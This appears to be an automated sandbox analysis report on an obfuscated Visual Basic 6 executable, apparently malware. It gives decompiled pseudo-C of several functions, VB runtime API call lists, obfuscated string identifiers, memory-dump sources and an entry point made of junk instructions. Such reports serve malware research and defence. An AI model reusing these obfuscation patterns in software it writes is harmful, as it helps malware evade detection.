                                                        • __vbaChkstk.MSVBVM60(?,00401216), ref: 004102C2
                                                        • #584.MSVBVM60(?,?,?,?,?,?,00401216), ref: 004102F7
                                                        • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401216), ref: 004102FC
                                                        • __vbaVarLateMemCallLd.MSVBVM60(?,?,fBR6AW7RVexTeqW175,00000000,?,?,?,?,?,?,00401216), ref: 0041031F
                                                        • __vbaNew2.MSVBVM60(0040470C,0041233C,?,?,?,00401216), ref: 0041033A
                                                        • __vbaCastObjVar.MSVBVM60(?,004046DC,XvSsEqomQo7ygk5AD1LzXEnpJHmiJWdnPM37), ref: 00410371
                                                        • __vbaObjSet.MSVBVM60(?,00000000,?,004046DC,XvSsEqomQo7ygk5AD1LzXEnpJHmiJWdnPM37), ref: 0041037B
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004046FC,00000040), ref: 004103B6
                                                        • __vbaFreeObj.MSVBVM60(00000000,?,004046FC,00000040), ref: 004103CD
                                                        • __vbaFreeVar.MSVBVM60(00000000,?,004046FC,00000040), ref: 004103D5
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401120,00404544,000006F8), ref: 00410461
                                                        • __vbaStrCopy.MSVBVM60(00000000,00401120,00404544,000006F8), ref: 0041048F
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401120,00404544,000006FC), ref: 004104F3
                                                        • __vbaFreeStr.MSVBVM60(00000000,00401120,00404544,000006FC), ref: 0041050A
                                                        • __vbaStrCopy.MSVBVM60(00000000,00401120,00404544,000006FC), ref: 0041053F
                                                        • __vbaStrCopy.MSVBVM60(00000000,00401120,00404544,000006FC), ref: 0041054C
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401120,00404544,00000700), ref: 004105BC
                                                        • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004105E2
                                                        • __vbaStrCopy.MSVBVM60(?,?,00401216), ref: 004105F2
                                                        • __vbaFreeStr.MSVBVM60(?,00000CE8,00003152,?,?,?), ref: 00410644
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401120,00404544,00000704,?,?,00002F2D,00000C2A,?,?,00000CE8,00003152,?,?,?), ref: 004106C9
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00002F2D,00000C2A,?,?,00000CE8,00003152), ref: 00410707
                                                        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00002F2D,00000C2A,?,?,00000CE8,00003152), ref: 00410746
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00002F2D,00000C2A,?,?,00000CE8,00003152), ref: 0041075A
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401120,00404544,00000708,?,?,?,?,?,?,?,?,?,?,00002F2D,00000C2A), ref: 004107C8
                                                        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00002F2D,00000C2A,?,?,00000CE8,00003152), ref: 004107DF
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401120,00404544,0000070C,?,?,000F5AA2), ref: 0041082A
                                                        • __vbaNew2.MSVBVM60(0040470C,0041233C,?,?,000F5AA2,?,?,?,?,?,?,?,?,?,?,00002F2D), ref: 00410851
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004046FC,00000014,?,?,000F5AA2), ref: 004108B3
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004048C0,00000078,?,?,000F5AA2), ref: 00410909
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,000F5AA2,?,?,?,?,?,?,?,?,?,?,00002F2D), ref: 00410928
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401120,00404514,000001BC,?,?,?,?,000F5AA2), ref: 00410961
                                                        • __vbaFreeVar.MSVBVM60(004109C2,?,?,?,?,000F5AA2), ref: 004109BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: __vba$CheckHresult$Free$Copy$New2$#584CallCastChkstkLateList
                                                        • String ID: d$<#A$<#A$EAWheWO9mwsnBodahuVmXN5KoZmHu473$I20$JBhDOdbStjQgpp1CZ1sII6Bi6Mrw22$Mnbd91g4szlScb9$O119$O72$VIWpK2VU9f224$XvSsEqomQo7ygk5AD1LzXEnpJHmiJWdnPM37$Z3$aBxJ1EK9Or90qp8Afn674$fBR6AW7RVexTeqW175$u5Ya74wgTUO8iTCNpzL0XAUeDHmKGZp2IrI136$yelwDMF3SOzyY2197
                                                        • API String ID: 464748651-660937135
                                                        • Opcode ID: da9ca8f2bf9868f8c770115edff007b3e1e76d552e6fa093b7134fbe8e3cc729
                                                        • Instruction ID: e17d8b8cc86cee60c052054923feb4cfec82cc9cc64e118a3be219f1e9f3270d
                                                        • Opcode Fuzzy Hash: da9ca8f2bf9868f8c770115edff007b3e1e76d552e6fa093b7134fbe8e3cc729
                                                        • Instruction Fuzzy Hash: C912D6B1900218EFEB11DFA1CD45BDDBBB8BF48304F1041AAE609BB2A1D7785A95CF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 47%
                                                        			E00410E70(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				char _v44;
                                                        				char _v48;
                                                        				char _v52;
                                                        				intOrPtr _v60;
                                                        				char _v68;
                                                        				char _v84;
                                                        				intOrPtr _v108;
                                                        				char _v116;
                                                        				void* _v120;
                                                        				signed int _v124;
                                                        				intOrPtr* _v128;
                                                        				signed int _v132;
                                                        				char _v140;
                                                        				signed int _v144;
                                                        				signed int _v148;
                                                        				short _t58;
                                                        				char* _t61;
                                                        				signed int _t69;
                                                        				char* _t72;
                                                        				char* _t73;
                                                        				signed int _t76;
                                                        				intOrPtr _t88;
                                                        
                                                        				_push(0x401216);
                                                        				_push( *[fs:0x0]);
                                                        				 *[fs:0x0] = _t88;
                                                        				L00401210();
                                                        				_v12 = _t88;
                                                        				_v8 = 0x4011b0;
                                                        				_push(L"01/01/");
                                                        				_push(0x404a30);
                                                        				L004012B8();
                                                        				_v60 = 0x80;
                                                        				_v68 = 8;
                                                        				_push( &_v68);
                                                        				_push( &_v84); // executed
                                                        				L004012BE(); // executed
                                                        				_v108 = 0x7d1;
                                                        				_v116 = 0x8002;
                                                        				_push( &_v84);
                                                        				_t58 =  &_v116;
                                                        				_push(_t58);
                                                        				L004012FA();
                                                        				_v120 = _t58;
                                                        				_push( &_v84);
                                                        				_push( &_v68);
                                                        				_push(2);
                                                        				L004012E2();
                                                        				_t61 = _v120;
                                                        				if(_t61 != 0) {
                                                        					_push(0);
                                                        					_push(L"afraU8zDjOaj75wVxobm84Z163");
                                                        					_push( &_v44);
                                                        					_push( &_v68);
                                                        					L00401336();
                                                        					if( *0x41233c != 0) {
                                                        						_v140 = 0x41233c;
                                                        					} else {
                                                        						_push(0x41233c);
                                                        						_push(0x40470c);
                                                        						L00401330();
                                                        						_v140 = 0x41233c;
                                                        					}
                                                        					_t19 =  &_v140; // 0x41233c
                                                        					_v120 =  *((intOrPtr*)( *_t19));
                                                        					_t69 =  *((intOrPtr*)( *_v120 + 0x1c))(_v120,  &_v48);
                                                        					asm("fclex");
                                                        					_v124 = _t69;
                                                        					if(_v124 >= 0) {
                                                        						_v144 = _v144 & 0x00000000;
                                                        					} else {
                                                        						_push(0x1c);
                                                        						_push(0x4046fc);
                                                        						_push(_v120);
                                                        						_push(_v124);
                                                        						L0040131E();
                                                        						_v144 = _t69;
                                                        					}
                                                        					_v128 = _v48;
                                                        					_v108 = 1;
                                                        					_v116 = 2;
                                                        					L00401210();
                                                        					asm("movsd");
                                                        					asm("movsd");
                                                        					asm("movsd");
                                                        					asm("movsd");
                                                        					_t72 =  &_v68;
                                                        					L00401324();
                                                        					_t73 =  &_v52;
                                                        					L0040132A();
                                                        					_t76 =  *((intOrPtr*)( *_v128 + 0x58))(_v128, _t73, _t73, _t72, _t72, 0x4046dc, 0x10);
                                                        					asm("fclex");
                                                        					_v132 = _t76;
                                                        					if(_v132 >= 0) {
                                                        						_v148 = _v148 & 0x00000000;
                                                        					} else {
                                                        						_push(0x58);
                                                        						_push(0x404a70);
                                                        						_push(_v128);
                                                        						_push(_v132);
                                                        						L0040131E();
                                                        						_v148 = _t76;
                                                        					}
                                                        					_push( &_v48);
                                                        					_t61 =  &_v52;
                                                        					_push(_t61);
                                                        					_push(2);
                                                        					L004012B2();
                                                        					L00401312();
                                                        				}
                                                        				_push(0x411055);
                                                        				L00401312();
                                                        				return _t61;
                                                        			}



























                                                        0x00410e75
                                                        0x00410e80
                                                        0x00410e81
                                                        0x00410e8d
                                                        0x00410e95
                                                        0x00410e98
                                                        0x00410e9f
                                                        0x00410ea4
                                                        0x00410ea9
                                                        0x00410eae
                                                        0x00410eb1
                                                        0x00410ebb
                                                        0x00410ebf
                                                        0x00410ec0
                                                        0x00410ec5
                                                        0x00410ecc
                                                        0x00410ed6
                                                        0x00410ed7
                                                        0x00410eda
                                                        0x00410edb
                                                        0x00410ee0
                                                        0x00410ee7
                                                        0x00410eeb
                                                        0x00410eec
                                                        0x00410eee
                                                        0x00410ef6
                                                        0x00410efc
                                                        0x00410f02
                                                        0x00410f04
                                                        0x00410f0c
                                                        0x00410f10
                                                        0x00410f11
                                                        0x00410f20
                                                        0x00410f3d
                                                        0x00410f22
                                                        0x00410f22
                                                        0x00410f27
                                                        0x00410f2c
                                                        0x00410f31
                                                        0x00410f31
                                                        0x00410f47
                                                        0x00410f4f
                                                        0x00410f5e
                                                        0x00410f61
                                                        0x00410f63
                                                        0x00410f6a
                                                        0x00410f86
                                                        0x00410f6c
                                                        0x00410f6c
                                                        0x00410f6e
                                                        0x00410f73
                                                        0x00410f76
                                                        0x00410f79
                                                        0x00410f7e
                                                        0x00410f7e
                                                        0x00410f90
                                                        0x00410f93
                                                        0x00410f9a
                                                        0x00410fa4
                                                        0x00410fae
                                                        0x00410faf
                                                        0x00410fb0
                                                        0x00410fb1
                                                        0x00410fb7
                                                        0x00410fbb
                                                        0x00410fc1
                                                        0x00410fc5
                                                        0x00410fd3
                                                        0x00410fd6
                                                        0x00410fd8
                                                        0x00410fdf
                                                        0x00410ffb
                                                        0x00410fe1
                                                        0x00410fe1
                                                        0x00410fe3
                                                        0x00410fe8
                                                        0x00410feb
                                                        0x00410fee
                                                        0x00410ff3
                                                        0x00410ff3
                                                        0x00411005
                                                        0x00411006
                                                        0x00411009
                                                        0x0041100a
                                                        0x0041100c
                                                        0x00411017
                                                        0x00411017
                                                        0x0041101c
                                                        0x0041104f
                                                        0x00411054

                                                        APIs
                                                        • __vbaChkstk.MSVBVM60(?,00401216), ref: 00410E8D
                                                        • __vbaStrCat.MSVBVM60(00404A30,01/01/,?,?,?,?,00401216), ref: 00410EA9
                                                        • #553.MSVBVM60(?,00000008,?,?,?,?,?,?,?,00404A30,01/01/,?,?,?,?,00401216), ref: 00410EC0
                                                        • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00410EDB
                                                        • __vbaFreeVarList.MSVBVM60(00000002,00000008,?,00008002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00410EEE
                                                        • __vbaVarLateMemCallLd.MSVBVM60(?,?,afraU8zDjOaj75wVxobm84Z163,00000000), ref: 00410F11
                                                        • __vbaNew2.MSVBVM60(0040470C,0041233C), ref: 00410F2C
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004046FC,0000001C), ref: 00410F79
                                                        • __vbaChkstk.MSVBVM60(00000000,?,004046FC,0000001C), ref: 00410FA4
                                                        • __vbaCastObjVar.MSVBVM60(?,004046DC), ref: 00410FBB
                                                        • __vbaObjSet.MSVBVM60(?,00000000,?,004046DC), ref: 00410FC5
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404A70,00000058), ref: 00410FEE
                                                        • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041100C
                                                        • __vbaFreeVar.MSVBVM60 ref: 00411017
                                                        • __vbaFreeVar.MSVBVM60(00411055), ref: 0041104F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: __vba$Free$CheckChkstkHresultList$#553CallCastLateNew2
                                                        • String ID: 01/01/$<#A$afraU8zDjOaj75wVxobm84Z163
                                                        • API String ID: 1321923347-2313547846
                                                        • Opcode ID: 547cac3de27f5dcff39d1321166f0eb79b8bfe5b65176f9f3d5e02203f13a127
                                                        • Instruction ID: 210271a388282a337ab05d634464135fe5665d822b941136bec2fa3bfa165509
                                                        • Opcode Fuzzy Hash: 547cac3de27f5dcff39d1321166f0eb79b8bfe5b65176f9f3d5e02203f13a127
                                                        • Instruction Fuzzy Hash: 8E5109B1D40218AADB20EBE5CC46FDEB7B8BB08704F20416EF505B7192DBB859858F58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 53%
                                                        			E00410B9B(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				void* _v32;
                                                        				intOrPtr _v40;
                                                        				intOrPtr _v48;
                                                        				signed int _v52;
                                                        				void* _v64;
                                                        				signed int _v68;
                                                        				signed int _t33;
                                                        				signed int _t37;
                                                        				void* _t47;
                                                        				void* _t49;
                                                        				intOrPtr _t50;
                                                        
                                                        				_t50 = _t49 - 0xc;
                                                        				 *[fs:0x0] = _t50;
                                                        				L00401210();
                                                        				_v16 = _t50;
                                                        				_v12 = 0x401190;
                                                        				_v8 = 0;
                                                        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x2c,  *[fs:0x0], 0x401216, _t47);
                                                        				_v40 = 0x80020004;
                                                        				_v48 = 0xa;
                                                        				_t33 = 0x10;
                                                        				L00401210();
                                                        				asm("movsd");
                                                        				asm("movsd");
                                                        				asm("movsd");
                                                        				asm("movsd");
                                                        				_push(L"IP170");
                                                        				_push(L"sY9Xfb7wjRH6PPztZMDLYwzI8iHass3238");
                                                        				_push(L"XWy1T132"); // executed
                                                        				L004012D0(); // executed
                                                        				L004012D6();
                                                        				_push(_t33);
                                                        				_push(0);
                                                        				L004012DC();
                                                        				asm("sbb eax, eax");
                                                        				_v52 =  ~( ~( ~_t33));
                                                        				L00401306();
                                                        				_t37 = _v52;
                                                        				if(_t37 == 0) {
                                                        					L9:
                                                        					asm("wait");
                                                        					_push(0x410d0e);
                                                        					return _t37;
                                                        				} else {
                                                        					__fp0 =  *0x401188;
                                                        					_push(__ecx);
                                                        					_v64 =  *0x401188;
                                                        					__fp0 =  *0x401180;
                                                        					__fp0 =  *0x401180 *  *0x401178;
                                                        					if( *0x412000 != 0) {
                                                        						_push( *0x401174);
                                                        						_push( *0x401170);
                                                        						L00401234();
                                                        					} else {
                                                        						__fp0 = __fp0 /  *0x401170;
                                                        					}
                                                        					asm("fnstsw ax");
                                                        					if((__al & 0x0000000d) != 0) {
                                                        						goto L1;
                                                        					} else {
                                                        						_v64 = __fp0;
                                                        						__fp0 = _v64;
                                                        						 *__esp = _v64;
                                                        						__fp0 =  *0x401168;
                                                        						 *__esp =  *0x401168;
                                                        						__fp0 =  *0x401160;
                                                        						L004012CA();
                                                        						__fp0 =  *0x401158;
                                                        						 *__esp =  *0x401158;
                                                        						__fp0 =  *0x401154;
                                                        						 *__esp =  *0x401154;
                                                        						__fp0 =  *0x401150;
                                                        						 *__esp =  *0x401150;
                                                        						_a4 =  *_a4;
                                                        						__eax =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, __ecx, __ecx, __ecx, __eax, __ecx, __ecx);
                                                        						asm("fclex");
                                                        						_v52 = __eax;
                                                        						if(_v52 >= 0) {
                                                        							_v68 = _v68 & 0x00000000;
                                                        						} else {
                                                        							_push(0x2c0);
                                                        							_push(0x404514);
                                                        							_push(_a4);
                                                        							_push(_v52);
                                                        							L0040131E();
                                                        							_v68 = __eax;
                                                        						}
                                                        						goto L9;
                                                        					}
                                                        				}
                                                        				L1:
                                                        				return __imp____vbaFPException();
                                                        			}

















                                                        0x00410b9e
                                                        0x00410bad
                                                        0x00410bb7
                                                        0x00410bbf
                                                        0x00410bc2
                                                        0x00410bc9
                                                        0x00410bd8
                                                        0x00410bdb
                                                        0x00410be2
                                                        0x00410beb
                                                        0x00410bec
                                                        0x00410bf6
                                                        0x00410bf7
                                                        0x00410bf8
                                                        0x00410bf9
                                                        0x00410bfa
                                                        0x00410bff
                                                        0x00410c04
                                                        0x00410c09
                                                        0x00410c13
                                                        0x00410c18
                                                        0x00410c19
                                                        0x00410c1b
                                                        0x00410c22
                                                        0x00410c28
                                                        0x00410c2f
                                                        0x00410c34
                                                        0x00410c3a
                                                        0x00410cfc
                                                        0x00410cfc
                                                        0x00410cfd
                                                        0x00000000
                                                        0x00410c40
                                                        0x00410c40
                                                        0x00410c46
                                                        0x00410c47
                                                        0x00410c4a
                                                        0x00410c50
                                                        0x00410c5d
                                                        0x00410c67
                                                        0x00410c6d
                                                        0x00410c73
                                                        0x00410c5f
                                                        0x00410c5f
                                                        0x00410c5f
                                                        0x00410c78
                                                        0x00410c7c
                                                        0x00000000
                                                        0x00410c82
                                                        0x00410c82
                                                        0x00410c85
                                                        0x00410c89
                                                        0x00410c8c
                                                        0x00410c93
                                                        0x00410c96
                                                        0x00410c9c
                                                        0x00410ca2
                                                        0x00410ca9
                                                        0x00410cac
                                                        0x00410cb3
                                                        0x00410cb6
                                                        0x00410cbd
                                                        0x00410cc8
                                                        0x00410ccd
                                                        0x00410cd3
                                                        0x00410cd5
                                                        0x00410cdc
                                                        0x00410cf8
                                                        0x00410cde
                                                        0x00410cde
                                                        0x00410ce3
                                                        0x00410ce8
                                                        0x00410ceb
                                                        0x00410cee
                                                        0x00410cf3
                                                        0x00410cf3
                                                        0x00000000
                                                        0x00410cdc
                                                        0x00410c7c
                                                        0x0040121c
                                                        0x0040121c

                                                        APIs
                                                        • __vbaChkstk.MSVBVM60(?,00401216), ref: 00410BB7
                                                        • __vbaChkstk.MSVBVM60 ref: 00410BEC
                                                        • #689.MSVBVM60(XWy1T132,sY9Xfb7wjRH6PPztZMDLYwzI8iHass3238,IP170), ref: 00410C09
                                                        • __vbaStrMove.MSVBVM60(XWy1T132,sY9Xfb7wjRH6PPztZMDLYwzI8iHass3238,IP170), ref: 00410C13
                                                        • __vbaStrCmp.MSVBVM60(00000000,00000000,XWy1T132,sY9Xfb7wjRH6PPztZMDLYwzI8iHass3238,IP170), ref: 00410C1B
                                                        • __vbaFreeStr.MSVBVM60(00000000,00000000,XWy1T132,sY9Xfb7wjRH6PPztZMDLYwzI8iHass3238,IP170), ref: 00410C2F
                                                        • _adj_fdiv_m64.MSVBVM60(?,00000000,00000000,XWy1T132,sY9Xfb7wjRH6PPztZMDLYwzI8iHass3238,IP170), ref: 00410C73
                                                        • __vbaFpI4.MSVBVM60(?,?,?,00000000,00000000,XWy1T132,sY9Xfb7wjRH6PPztZMDLYwzI8iHass3238,IP170), ref: 00410C9C
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401190,00404514,000002C0,?,?,?,00000000,?,?,?,00000000,00000000,XWy1T132,sY9Xfb7wjRH6PPztZMDLYwzI8iHass3238,IP170), ref: 00410CEE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: __vba$Chkstk$#689CheckFreeHresultMove_adj_fdiv_m64
                                                        • String ID: IP170$XWy1T132$sY9Xfb7wjRH6PPztZMDLYwzI8iHass3238
                                                        • API String ID: 3051951794-3142893037
                                                        • Opcode ID: 01c6cef0cf10cca0a7800767d7f64d017c2e568ea6ee42981d44a40fbd97d115
                                                        • Instruction ID: 6dea7651b902a0e47c7f532819939087948e8a2b2081fa1fac94f24ad7662227
                                                        • Opcode Fuzzy Hash: 01c6cef0cf10cca0a7800767d7f64d017c2e568ea6ee42981d44a40fbd97d115
                                                        • Instruction Fuzzy Hash: 21415E70950208EFDB05AFA1ED49BAE7BB4FB08740F01456AF641BA1F0D7794494CB5D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 72%
                                                        			E00410AA5(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				void* _v28;
                                                        				char _v44;
                                                        				signed int _v68;
                                                        				char _v76;
                                                        				short _v80;
                                                        				short _t32;
                                                        				char* _t33;
                                                        				void* _t44;
                                                        				void* _t46;
                                                        				intOrPtr _t47;
                                                        
                                                        				_t47 = _t46 - 0xc;
                                                        				 *[fs:0x0] = _t47;
                                                        				L00401210();
                                                        				_v16 = _t47;
                                                        				_v12 = 0x401140;
                                                        				_v8 = 0;
                                                        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x40,  *[fs:0x0], 0x401216, _t44);
                                                        				L0040130C();
                                                        				_push(L"vD20d9OT8VdPbuDq42AYuNvWBBRLITtO180");
                                                        				_push(L"CJnpAGccH2dZYALc9169");
                                                        				_push( &_v44); // executed
                                                        				L004012F4(); // executed
                                                        				_v68 = _v68 & 0x00000000;
                                                        				_v76 = 0x8008;
                                                        				_push( &_v44);
                                                        				_t32 =  &_v76;
                                                        				_push(_t32);
                                                        				L004012FA();
                                                        				_v80 = _t32;
                                                        				L00401312();
                                                        				_t33 = _v80;
                                                        				if(_t33 != 0) {
                                                        					_v68 = L"zbHHUUvyVtdpA2cOBtzUSeNU2110";
                                                        					_v76 = 8;
                                                        					L004012E8();
                                                        					_t33 =  &_v44;
                                                        					_push(_t33);
                                                        					L004012EE();
                                                        					L00401312();
                                                        				}
                                                        				_push(0x410b7c);
                                                        				L00401306();
                                                        				return _t33;
                                                        			}
















                                                        0x00410aa8
                                                        0x00410ab7
                                                        0x00410ac1
                                                        0x00410ac9
                                                        0x00410acc
                                                        0x00410ad3
                                                        0x00410ae2
                                                        0x00410aeb
                                                        0x00410af0
                                                        0x00410af5
                                                        0x00410afd
                                                        0x00410afe
                                                        0x00410b03
                                                        0x00410b07
                                                        0x00410b11
                                                        0x00410b12
                                                        0x00410b15
                                                        0x00410b16
                                                        0x00410b1b
                                                        0x00410b22
                                                        0x00410b27
                                                        0x00410b2d
                                                        0x00410b2f
                                                        0x00410b36
                                                        0x00410b43
                                                        0x00410b48
                                                        0x00410b4b
                                                        0x00410b4c
                                                        0x00410b54
                                                        0x00410b54
                                                        0x00410b59
                                                        0x00410b76
                                                        0x00410b7b

                                                        APIs
                                                        • __vbaChkstk.MSVBVM60(?,00401216), ref: 00410AC1
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,00401216), ref: 00410AEB
                                                        • #692.MSVBVM60(?,CJnpAGccH2dZYALc9169,vD20d9OT8VdPbuDq42AYuNvWBBRLITtO180,?,?,?,?,00401216), ref: 00410AFE
                                                        • __vbaVarTstNe.MSVBVM60(00008008,?), ref: 00410B16
                                                        • __vbaFreeVar.MSVBVM60(00008008,?), ref: 00410B22
                                                        • __vbaVarDup.MSVBVM60(00008008,?), ref: 00410B43
                                                        • #529.MSVBVM60(?,00008008,?), ref: 00410B4C
                                                        • __vbaFreeVar.MSVBVM60(?,00008008,?), ref: 00410B54
                                                        • __vbaFreeStr.MSVBVM60(00410B7C,00008008,?), ref: 00410B76
                                                        Strings
                                                        • vD20d9OT8VdPbuDq42AYuNvWBBRLITtO180, xrefs: 00410AF0
                                                        • CJnpAGccH2dZYALc9169, xrefs: 00410AF5
                                                        • zbHHUUvyVtdpA2cOBtzUSeNU2110, xrefs: 00410B2F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: __vba$Free$#529#692ChkstkCopy
                                                        • String ID: CJnpAGccH2dZYALc9169$vD20d9OT8VdPbuDq42AYuNvWBBRLITtO180$zbHHUUvyVtdpA2cOBtzUSeNU2110
                                                        • API String ID: 1647388376-3082981333
                                                        • Opcode ID: d59363b6bab7442fc89cb186633c596bd0c8fe68d1b4a09460bad3861067cdd5
                                                        • Instruction ID: 572c67f752b8977b4d9366f6d04c42286d1053683d4f06e0b693a95853544fe4
                                                        • Opcode Fuzzy Hash: d59363b6bab7442fc89cb186633c596bd0c8fe68d1b4a09460bad3861067cdd5
                                                        • Instruction Fuzzy Hash: 6411CC719002089BDB00EFD1C856BDEBBB8BF48718F54857EE501B71A1DB78958ACB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: 0={,
                                                        • API String ID: 1029625771-63937952
                                                        • Opcode ID: 1c36facfde1594bb22de901943bba2db3143677674557a431106ca83ced0a2b1
                                                        • Instruction ID: ea9daba634862822dabad3aada6543972b1e0ac6c04354f251d7922e4dfb06a4
                                                        • Opcode Fuzzy Hash: 1c36facfde1594bb22de901943bba2db3143677674557a431106ca83ced0a2b1
                                                        • Instruction Fuzzy Hash: E691C1B0A1920ACBDF22AE34C5A17EE776FAF57740F90411ADC424B646DB34C886CF52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 22%
                                                        			_entry_() {
                                                        				signed char _t49;
                                                        				intOrPtr* _t50;
                                                        				signed int _t51;
                                                        				signed int _t55;
                                                        				signed char _t61;
                                                        				signed char _t62;
                                                        				signed int _t63;
                                                        				signed char _t70;
                                                        				intOrPtr* _t85;
                                                        				intOrPtr _t87;
                                                        				signed int _t89;
                                                        				signed int _t90;
                                                        				signed int _t92;
                                                        				void* _t93;
                                                        				void* _t98;
                                                        				void* _t99;
                                                        				void* _t100;
                                                        				void* _t101;
                                                        				intOrPtr _t103;
                                                        
                                                        				_push("VB5!6&*"); // executed
                                                        				L0040135A(); // executed
                                                        				 *_t49 =  *_t49 + _t49;
                                                        				 *_t49 =  *_t49 + _t49;
                                                        				 *_t49 =  *_t49 + _t49;
                                                        				 *_t49 =  *_t49 ^ _t49;
                                                        				 *_t49 =  *_t49 + _t49;
                                                        				_t50 = _t49 + 1;
                                                        				 *_t50 =  *_t50 + _t50;
                                                        				 *_t50 =  *_t50 + _t50;
                                                        				 *_t50 =  *_t50 + _t50;
                                                        				asm("fdivrp st2, st0");
                                                        				_t51 = _t50 - 0x94;
                                                        				asm("insd");
                                                        				asm("lahf");
                                                        				 *_t51 =  *_t51 + _t51;
                                                        				 *_t51 =  *_t51 + _t51;
                                                        				 *_t51 =  *_t51 + _t51;
                                                        				 *_t51 =  *_t51 + _t51;
                                                        				 *_t51 =  *_t51 + _t51;
                                                        				 *_t51 =  *_t51 & _t51;
                                                        				 *_t51 =  *_t51 & _t51;
                                                        				 *_t51 =  *_t51 & _t51;
                                                        				asm("outsd");
                                                        				asm("outsb");
                                                        				asm("popad");
                                                        				asm("insb");
                                                        				 *((intOrPtr*)(_t90 + 0x75)) =  *((intOrPtr*)(_t90 + 0x75)) + _t51;
                                                        				asm("insb");
                                                        				asm("outsb");
                                                        				 *_t51 =  *_t51 + _t51;
                                                        				 *_t51 =  *_t51 + _t51;
                                                        				_t98 = _t93 + 1 - 1;
                                                        				 *_t51 =  *_t51 ^ _t51;
                                                        				 *((intOrPtr*)(_t51 + 0x72bb315a)) =  *((intOrPtr*)(_t51 + 0x72bb315a)) + _t98;
                                                        				asm("int 0x73");
                                                        				_t99 = _t98 - 1;
                                                        				asm("repe cli");
                                                        				 *0x56B47A60 =  *0x56B47A60 & 0x00000003;
                                                        				_t76 = 0xfd68146;
                                                        				_push(_t99);
                                                        				asm("enter 0x4848, 0xa1");
                                                        				_t8 = _t87 + 0x3ad0135d;
                                                        				 *_t8 = _t87;
                                                        				_t89 =  *_t8 - 1;
                                                        				asm("lodsd");
                                                        				asm("stosb");
                                                        				 *0xFFFFFFFFFFFFFFFE =  *((intOrPtr*)(0xfffffffffffffffe)) + 0xde;
                                                        				_t55 = 0x000000cc ^  *0xFFFFFFFFC6E850AD;
